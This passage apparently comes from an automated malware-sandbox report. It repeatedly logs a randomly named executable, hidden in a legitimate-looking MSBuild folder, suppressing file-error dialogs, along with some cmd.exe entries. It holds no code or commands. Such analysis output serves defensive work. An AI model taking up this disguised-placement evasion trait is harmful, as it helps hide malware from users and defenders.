                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
